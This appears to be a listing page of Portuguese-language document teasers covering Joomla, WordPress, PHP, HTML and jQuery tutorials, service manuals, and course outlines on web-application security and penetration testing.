Esse manual é um conjunto de perguntas e respostas para usuários(as) do Joomla! 1.5.

Esse manual é um conjunto de perguntas e respostas para usuários(as) do Joomla! 1.5. Esse manual é um conjunto de perguntas e respostas para usuários(as) do Joomla! 1.5. Ele considera que você já tem o Joomla! instalado no seu computador. Caso você queira utilizá lo em um servidor na web,

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Vulnerabilidade em Formulários PHP Construção de um formulário simples em PHP: Page 2

Leia mais

Desenvolvimento de Sites com PHP e Mysql Docente André Luiz Silva de Moraes

Desenvolvimento de Sites com PHP e Mysql Docente André Luiz Silva de Moraes Roteiro 2: Introdução a Linguagem HTML Desenvolvimento de Sites com PHP e Mysql Neste roteiro é explorada a linguagem HTML. A linguagem HTML (Hypertext Markup Language) é amplamente utilizada na construção

Leia mais

Curso PHP Aula 06. Bruno Falcão brunogfalcao@gmail.com

Curso PHP Aula 06. Bruno Falcão brunogfalcao@gmail.com + Curso PHP Aula 06 Bruno Falcão brunogfalcao@gmail.com + Upload de Arquivos Upload de arquivos Copiar um arquivo de uma máquina local para o servidor web. Exemplos: Imagens, videos, documentos, etc. +

Leia mais

Manual de Integração Via Gadget. Passo a passo para realizar a integração entre websites e a plataforma Virtual Target.

Manual de Integração Via Gadget. Passo a passo para realizar a integração entre websites e a plataforma Virtual Target. Manual de Integração Via Gadget Passo a passo para realizar a integração entre websites e a plataforma Virtual Target. Manual de Integração Via Gadget 1. Introdução 1.1. O que é? Virtual Target Gadgets

Leia mais

Manual de Utilização do GLPI

Manual de Utilização do GLPI Manual de Utilização do GLPI Perfil Usuário Versão 1.0 NTI Campus Muzambinho 1 Introdução Prezado servidor, o GLPI é um sistema de Service Desk composto por um conjunto de serviços para a administração

Leia mais

Tutorial Ouvidoria. Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante

Tutorial Ouvidoria. Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante Tutorial Ouvidoria Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante Como acessar a Ouvidoria? 1. Primeiramente acesse o site de sua instituição, como exemplo vamos utilizar

Leia mais

English Português. By erickalves 25 Julho, 2009-01:08. Devido à política (#) de segurança. Encontrar Blogs Crie o seu blog de graça Ganhe prêmios

English Português. By erickalves 25 Julho, 2009-01:08. Devido à política (#) de segurança. Encontrar Blogs Crie o seu blog de graça Ganhe prêmios Encontrar Blogs Crie o seu blog de graça Ganhe prêmios English Português Cel: +55 (21) 7417-9918 E-mail: erick@lithic.com.br Inserindo dados no banco em PHP + Ajax + jquery + Mysql + Validação (/pt-br/blog/tutoriais

Leia mais

Associação Carioca de Ensino Superior Centro Universitário Carioca

Associação Carioca de Ensino Superior Centro Universitário Carioca Desenvolvimento de Aplicações Web Lista de Exercícios Métodos HTTP 1. No tocante ao protocolo de transferência de hipertexto (HTTP), esse protocolo da categoria "solicitação e resposta" possui três métodos

Leia mais

Instituto de Inovação com TIC. [Junho/ 2009]

Instituto de Inovação com TIC. [Junho/ 2009] Instituto de Inovação com TIC [Junho/ 2009] Segurança em aplicações WEB: A nova fronteira rodrigo.assad@cesar.org.br Redes de Computadores (Histórico) Segurança de Redes (Histórico) Robert Tappan

Leia mais

Mini-curso de PHP. Aulas ministradas por: André Luis de Paula Arthur Kalsing Diego Silva

Mini-curso de PHP. Aulas ministradas por: André Luis de Paula Arthur Kalsing Diego Silva Mini-curso de PHP Aulas ministradas por: André Luis de Paula Arthur Kalsing Diego Silva Aula 1 Breve introdução de HTML, Conceitos básicos de PHP, Sintaxe, Separador de instruções e Comentários (Cap 1

Leia mais

Principais Ferramentas do Tidia-ae

Principais Ferramentas do Tidia-ae Principais Ferramentas do Tidia-ae Durante o curso, será necessário que você conheça algumas ferramentas no ambiente do Tidia-ae. Vamos listar aqui as ferramentas Atividades, Fórum de Discussão, Repositório

Leia mais

Vamos criar uma nova Página chamada Serviços. Clique em Adicionar Nova.

Vamos criar uma nova Página chamada Serviços. Clique em Adicionar Nova. 3.5 Páginas: Ao clicar em Páginas, são exibidas todas as páginas criadas para o Blog. No nosso exemplo já existirá uma página com o Título Página de Exemplo, criada quando o WorPress foi instalado. Ao

Leia mais

jquery André Tavares da Silva andre.silva@udesc.br

jquery André Tavares da Silva andre.silva@udesc.br jquery André Tavares da Silva andre.silva@udesc.br jquery jquery é uma biblioteca em JavaScript; Seu objetivo é simplificar a programação em JavaScript; jquery foi desenvolvida para ser de aprendizado

Leia mais

DOCUMENTAÇÃO DE USO. Neste material você encontrará todas as informações básicas para uso do seu gerenciador financeiro HOSTMGR.

DOCUMENTAÇÃO DE USO. Neste material você encontrará todas as informações básicas para uso do seu gerenciador financeiro HOSTMGR. DOCUMENTAÇÃO DE USO Neste material você encontrará todas as informações básicas para uso do seu gerenciador financeiro HOSTMGR. Este material ainda está em desenvolvimento, entretanto estamos disponibilizando

Leia mais

PROF. DANIELA PIRES. Aplicações para Web. Aplicações para Web - FMU - 2012 - Prof. Daniela Pires

PROF. DANIELA PIRES. Aplicações para Web. Aplicações para Web - FMU - 2012 - Prof. Daniela Pires PROF. DANIELA PIRES Aplicações para Web 1 *Oficialmente: *Uma biblioteca escrita em Javascript *Uma definição melhor: *jquery é uma Biblioteca JavaScript que simplifica a manipulação de um documento HTML

Leia mais

PDI 1 - Projeto e Design de Interfaces Web

PDI 1 - Projeto e Design de Interfaces Web Introdução a HTML e XHTML Elementos básicos parte 2 Professor: Victor Hugo L. Lopes Agenda: --Adicionando imagens; --Trabalhando com vídeos e sons em HTML; Disponível em http://wp.me/p48yvn-43 2 Inserindo

Leia mais

Tutorial Chat Online

Tutorial Chat Online Tutorial Chat Online Como funciona o Chat Online... 2 Tela de gerenciamento do Chat... 2 Personalizando o Atendimento... 3 Departamentos... 3 Criar Departamento... 3 Gerar Código HTML... 4 Operadores...

Leia mais

1. Introdução pág.3 2. Apresentação do sistema Joomla! pág.4 3. Acessando a administração do site pág.4 4. Artigos 4.1. Criando um Artigo 4.2.

1. Introdução pág.3 2. Apresentação do sistema Joomla! pág.4 3. Acessando a administração do site pág.4 4. Artigos 4.1. Criando um Artigo 4.2. 1. Introdução pág.3 2. Apresentação do sistema Joomla! pág.4 3. Acessando a administração do site pág.4 4. Artigos 4.1. Criando um Artigo 4.2. Editando um Artigo 4.3. Excluindo um Artigo 4.4. Publicar

Leia mais

Segurança Web com PHP 5

Segurança Web com PHP 5 Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

Programação para Internet I

Programação para Internet I Programação para Internet I Aula 6 PHP: Include, Require, Variáveis de ambiente Prof. Teresinha Letícia da Silva leticiasfw@yahoo.com.br Inclusão de arquivos com Include e Require no PHP Uma técnica muito

Leia mais

Omega Tecnologia Manual Omega Hosting

Omega Tecnologia Manual Omega Hosting Omega Tecnologia Manual Omega Hosting 1 2 Índice Sobre o Omega Hosting... 3 1 Primeiro Acesso... 4 2 Tela Inicial...5 2.1 Área de menu... 5 2.2 Área de navegação... 7 3 Itens do painel de Controle... 8

Leia mais

Desenvolvimento em Ambiente Web. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com

Desenvolvimento em Ambiente Web. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Desenvolvimento em Ambiente Web Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Listas A HTML permite definir três categorias distintas de listas: Ordenadas Sem ordenação Lista de definição 2/28 Listas

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

PROCEDIMENTO OPERACIONAL PADRÃO. Serviço Administração do CA

PROCEDIMENTO OPERACIONAL PADRÃO. Serviço Administração do CA 1 de 12 Analista de Suporte I 1 Acesso ao sistema O sistema de chamados esta disponível na web no endereço HTTP://sme.netcenter.com.br O acesso ao sistema é feito com o número de designação do estabelecimento.

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

Como colocar uma notícia no site internet da UMMSP?

Como colocar uma notícia no site internet da UMMSP? Como colocar uma notícia no site internet da UMMSP? 1) Acessar ao frontend www.sp.unmp.org.br/administrator Colocar o nome de utilizador e a senha para entrar Depois clicar no autenticar e você vai acessar

Leia mais

Menus Personalizados

Menus Personalizados Menus Personalizados Conceitos básicos do Painel Logando no Painel de Controle Para acessar o painel de controle do Wordpress do seu servidor siga o exemplo abaixo: http://www.seusite.com.br/wp-admin Entrando

Leia mais

Ferramentas para Multimídia e Internet - 1486

Ferramentas para Multimídia e Internet - 1486 1 Ferramentas para Multimídia e Internet - 1486 HTML BÁSICO: O que é uma página WEB? Uma página WEB, também conhecida pelo termo inglês webpage, é uma "página" na World Wide Web, geralmente em formato

Leia mais

Programa Intel Educar Tutorial: Ferramenta de Classificação Visual

Programa Intel Educar Tutorial: Ferramenta de Classificação Visual Copyright 2008, Intel Corporation. Todos os direitos reservados. Página 1 de 17 TUTORIAL: FERRAMENTA DE CLASSIFICAÇÃO VISUAL ÍNDICE 1. Acessando a ferramenta... 3 2. Como se cadastrar... 4 3. Usando a

Leia mais

VULNERABILIDADES WEB v.2.2

VULNERABILIDADES WEB v.2.2 VULNERABILIDADES WEB v.2.2 $ whoami Sgt NILSON Sangy Computer Hacking Forensic Investigator Analista de Segurança da Informação Guerreiro Cibernético $ ls -l /etc 1. Contextualização 2. OWASP 2.1. Injeção

Leia mais

DNS DOMAIN NAME SERVER

DNS DOMAIN NAME SERVER DNS DOMAIN NAME SERVER INTRODUÇÃO Quando você navega na internet ou manda uma mensagem de e-mail, você estará utilizando um nome de domínio. Por exemplo, a URL "http://www.google.com.br" contém o nome

Leia mais

O formulário de registro de usuário via web do SciFinder permite que você crie seu nome de usuário e senha no SciFinder.

O formulário de registro de usuário via web do SciFinder permite que você crie seu nome de usuário e senha no SciFinder. CAPES End User Registration Guide 10-5-11.doc Como se registrar para usar o SciFinder (CAPES) Introdução O formulário de registro de usuário via web do SciFinder permite que você crie seu nome de usuário

Leia mais